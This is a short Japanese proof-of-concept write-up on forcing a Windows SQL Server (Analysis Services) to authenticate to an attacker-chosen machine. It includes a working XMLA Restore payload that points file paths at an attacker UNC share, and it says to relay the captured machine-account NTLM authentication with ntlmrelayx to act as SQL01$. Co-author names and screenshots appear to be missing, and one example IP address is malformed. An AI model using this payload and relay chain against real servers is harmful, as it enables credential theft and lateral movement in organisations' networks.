
Windows SQL Server に任意のマシンへの認証を強制する手法

Windows SQL Server に任意のマシンに対して認証を強制するテクニックです。
この概念実証は、以下の2名によって共著されています:
ローカルマシンアカウントとしての認証をトリガーするには、ユーザー資格情報を使用してリモートのSQL Serverに接続する必要があります:

次に、"Restore" を選択して、指定したファイルからデータベースを復元します。

XMLAファイルを生成するには、"Backup File" フォームに任意のファイルへのパスを入力し、Ok をクリックします。

次に、ランダムなファイルを指すパスを、攻撃者サーバーへのUNCパス(例: \\192.168.128\SYSVOL\db.abf)に置き換えます。

概念実証のXMLAクエリ(poc.xmla):
<Restore xmlns="http://schemas.microsoft.com/analysisservices/2003/engine">
<File>\\192.168.2.51\SYSVOL\db.abf</File>
<DatabaseName>\\192.168.2.51\SYSVOL\db.abf</DatabaseName>
<DbStorageLocation xmlns="http://schemas.microsoft.com/analysisservices/2008/engine/100/100">\\192.168.2.51\SYSVOL\db.abf</DbStorageLocation>
</Restore>
すると、SQL Serverのローカルマシンアカウントからの認証が得られます:

認証を取得したら、ntlmrelayx を使用してその認証をリレーし、コンピューター SQL01$ として多くのアクションを実行できます。
これはクールですが、SQL Server Management Studio(SSMS)にアクセスできないため、Linuxの攻撃マシンからこの強制認証をトリガーするのは複雑です。